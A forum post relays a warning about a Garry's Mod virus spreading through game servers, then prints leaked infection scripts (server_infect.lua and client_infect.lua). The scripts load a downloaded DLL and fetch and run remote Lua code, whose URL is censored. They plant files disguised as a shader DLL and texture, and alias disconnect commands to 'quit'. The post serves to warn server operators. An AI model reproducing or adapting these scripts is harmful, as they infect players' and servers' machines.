pokenow123
Medic
- Joined
- Dec 30, 2012
- Messages
- 13
- Reaction score
- 4
The following is from Facepunch:
10 minutes a ago friend contacted me about his steam being spammed with messages like "fix it vinh" to all of his steam friends after joining a server. (here's the chatlog http://puu.sh/8ej4h.txt)
When bringing it up to Dingusnin he told me that there was a thread made about this 5min ago, but after I had a look it at it got deleted because it contained the code to spread the virus. We managed to save the virus code, but we can't spread it right here since the thread would get deleted again.
Here is a censored version of the original post.
Some of our clients, and our server, recently got messed with by Chrisaster, or one of his buddies that go under the same name, or VIN, these include the files client_infect.lua, and server_infect.lua.
Seems they do this through client uploads.
Not 100% sure, but it seems they Hack into RCON (They can get your RCON password through clientside lua, even with client uploads disabled), put some files on there, then they use some other fancy doodads to infect the server and clients more.
Some of their code leaked into our console, so here's what I found, make what you want of it, and keep in mind that these scripts were very recently made, this is a new thing:
Here's the server_infect.lua
-- Loaded over HTTP by Lua through CompileString(...)() via rcon request
Here's the client_infect.lua
-- Loaded over HTTP by Lua through client:SendLua(..)
Source: http://facepunch.com/showthread.php?t=1386818
10 minutes a ago friend contacted me about his steam being spammed with messages like "fix it vinh" to all of his steam friends after joining a server. (here's the chatlog http://puu.sh/8ej4h.txt)
When bringing it up to Dingusnin he told me that there was a thread made about this 5min ago, but after I had a look it at it got deleted because it contained the code to spread the virus. We managed to save the virus code, but we can't spread it right here since the thread would get deleted again.
Here is a censored version of the original post.
Some of our clients, and our server, recently got messed with by Chrisaster, or one of his buddies that go under the same name, or VIN, these include the files client_infect.lua, and server_infect.lua.
Seems they do this through client uploads.
Not 100% sure, but it seems they Hack into RCON (They can get your RCON password through clientside lua, even with client uploads disabled), put some files on there, then they use some other fancy doodads to infect the server and clients more.
Some of their code leaked into our console, so here's what I found, make what you want of it, and keep in mind that these scripts were very recently made, this is a new thing:
Here's the server_infect.lua
-- Loaded over HTTP by Lua through CompileString(...)() via rcon request
Code:
if not system.IsWindows() then
return
end
if file.Exists("lua/autorun/server/default.lua", "MOD") then
return -- Already infected
end
timer.Create("infchk", 2, 0, function()
if file.Exists("download/engine_win32.dll", "MOD") then
timer.Remove("infchk")
require("/../../../download/engine")
http.Fetch("*ACTUAL LINK TO VIRUS CODE HERE", function(content)
CreateFile("garrysmod/lua/autorun/server/default.lua", content)
include("autorun/server/default.lua")
end, function() end)
end
end)Here's the client_infect.lua
-- Loaded over HTTP by Lua through client:SendLua(..)
Code:
if not system.IsWindows() then
return
end
if file.Exists("bin/game_shader_generic_engine.dll", "MOD") then
return -- Already infected
end
timer.Create("infchk", 2, 0, function()
if file.Exists("download/engine_win32.dll", "MOD") then
timer.Remove("infchk")
require("/../../../download/engine")
http.Fetch("SAME HERE", function(content)
CreateFile("garrysmod/bin/game_shader_generic_engine.dll", GetShaderBinary())
CreateFile("garrysmod/materials/cooltexture.vtf", content)
local ret = CompileString( content, "l", false )
pcall(ret)
timer.Simple(4, function()
ConCommand("alias disconnect quit\n")
ConCommand("alias gamemenucommand quit\n")
ConCommand("alias retry quit\n")
ConCommand("alias connect quit\n")
ConCommand("alias map quit\n")
end)
end)
end
end)Source: http://facepunch.com/showthread.php?t=1386818
